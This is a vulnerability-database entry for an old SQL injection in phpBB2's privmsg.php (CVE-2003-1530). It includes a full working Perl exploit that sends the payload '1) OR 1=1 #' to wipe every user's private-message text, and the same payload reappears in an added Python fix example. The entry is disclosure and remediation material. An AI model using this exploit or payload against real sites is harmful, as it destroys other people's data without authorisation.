phpBB2 privmsg.php SQL Injection Vulnerability

Vulnerability ID: 1107164    Vulnerability type: SQL injection
Published: 2003-01-17    Updated: 2003-12-31
CVE ID: CVE-2003-1530    CNNVD-ID: CNNVD-200312-448
Platform: PHP    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/22182
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-448
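|Vulnerability details
phpBB2 is a free, open-source web forum/community application written in PHP that runs on Unix/Linux, MacOS and Microsoft Windows. The privmsg.php script in phpBB2 does not sufficiently filter user-supplied input, and a remote attacker can exploit this to alter the database query logic and delete all private messages. phpBB2 users can send private messages to any other user, but the function in privmsg.php that deletes private messages contains an SQL injection vulnerability. If a request is submitted to delete the private message numbered "1) OR 1=1 #", the private messages of all users on the system are deleted. Private messages are stored in two tables and the SQL injection works in only one of them, so the text of every message is deleted, while subjects and metadata are deleted only for the currently logged-in user.
|Exploit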
source: http://www.securityfocus.com/bid/6634/info

A SQL injection vulnerability has been reported for phpBB2 systems that may result in the deletion of all private messages.

phpBB2, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries to execute on the underlying database. As a result, it is possible to manipulate SQL queries. This may allow a remote attacker to modify query logic or potentially corrupt the database. 

A remote attacker can exploit this vulnerability by manipulating URI parameters to cause the text of all private messages to be deleted.

#!/usr/bin/perl --

# phpBB delete the text of all users' private messages exploit
# Ulf Harnhammar
# January 2003

use Socket;

if (@ARGV != 2) { die "usage: $0 host sid\n"; }

($host, $sid) = @ARGV;
$host =~ s|\s+||g;
$sid =~ s|\s+||g;

$crlf = "\015\012";
$http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
        "Host: $host$crlf".
        "User-Agent: Mozzarella/1.37++$crlf".
        "Referer: http://www.phpbb.com/$crlf".
        "Connection: close$crlf".
        "Content-Type: application/x-www-form-urlencoded$crlf".
        "Content-Length: 58$crlf$crlf".
        "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes";

$tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
$hosti = inet_aton($host) or die "Couldn't look up host!\n";
$hosts = sockaddr_in(80, $hosti);

socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
connect(SOK, $hosts) or die "Couldn't connect to port!\n";

select SOK; $| = 1; select STDOUT;

print SOK $http;

$junk = '';
while (<SOK>) { $junk .= $_; }

close SOK or die "Couldn't close!\n";
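The fix for this class of bug is to treat every `mark[]` value as an integer id and bind it as a parameter. The following is an added example, not phpBB's code or part of the original advisory: it uses Python and an in-memory SQLite database as a stand-in for PHP/MySQL, and the table names `pm` and `pm_text`, the function names, and the owner check are assumptions made for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed form bodies: a normal delete request and the body quoted in the script above.
BENIGN_BODY = "mode=&delete=true&mark%5B%5D=2&confirm=Yes"
ADVISORY_BODY = "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes"

def marked_ids(body):
    """Return mark[] values as ints; raise ValueError unless each is a plain positive integer."""
    ids = []
    for raw in parse_qs(body, keep_blank_values=True).get("mark[]", []):
        if not (raw.isascii() and raw.isdigit()) or int(raw) == 0:
            raise ValueError(f"non-numeric message id: {raw!r}")
        ids.append(int(raw))
    return ids

def naive_where(body):
    """The WHERE clause that plain string concatenation yields (shown only, never executed)."""
    return "id IN (" + ", ".join(parse_qs(body).get("mark[]", [])) + ")"

def delete_messages(db, user_id, body):
    """Delete only the caller's marked messages, using bound parameters throughout."""
    ids = marked_ids(body)
    if not ids:
        return 0
    marks = ", ".join("?" for _ in ids)
    # Resolve ownership first so the text table is never touched for other users' ids.
    owned = [r[0] for r in db.execute(
        f"SELECT id FROM pm WHERE owner = ? AND id IN ({marks})", [user_id, *ids])]
    for table in ("pm_text", "pm"):  # fixed table names, never user input
        db.executemany(f"DELETE FROM {table} WHERE id = ?", [(i,) for i in owned])
    return len(owned)

def demo():
    db = sqlite3.connect(":memory:")
    db.executescript("CREATE TABLE pm(id INTEGER PRIMARY KEY, owner INTEGER);"
                     "CREATE TABLE pm_text(id INTEGER PRIMARY KEY, body TEXT);")
    db.executemany("INSERT INTO pm VALUES (?, ?)", [(1, 10), (2, 20), (3, 20)])
    db.executemany("INSERT INTO pm_text VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])
    deleted = delete_messages(db, 20, BENIGN_BODY)
    try:
        delete_messages(db, 20, ADVISORY_BODY)
        rejected = False
    except ValueError:
        rejected = True
    remaining = [r[0] for r in db.execute("SELECT id FROM pm_text ORDER BY id")]
    return deleted, rejected, remaining
```

`naive_where` shows why the unfiltered value is dangerous: the closing parenthesis in the id ends the `IN (...)` list early, so the rest of the value becomes part of the query logic.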
|References

Source: BID
Name: 6634
Link: http://www.securityfocus.com/bid/6634
Source: BUGTRAQ
Name: 20030117 phpBB SQL Injection vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/307212/30/26300/threaded
Source: OSVDB
Name: 4277
Link: http://www.osvdb.org/4277
Source: SECUNIA
Name: 7887
Link: http://secunia.com/advisories/7887/
Source: BUGTRAQ
Name: 20030116 phpBB SQL Injection vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2003-01/0125.html
Source: NSFOCUS
Name: 4241
Link: http://www.nsfocus.net/vulndb/4241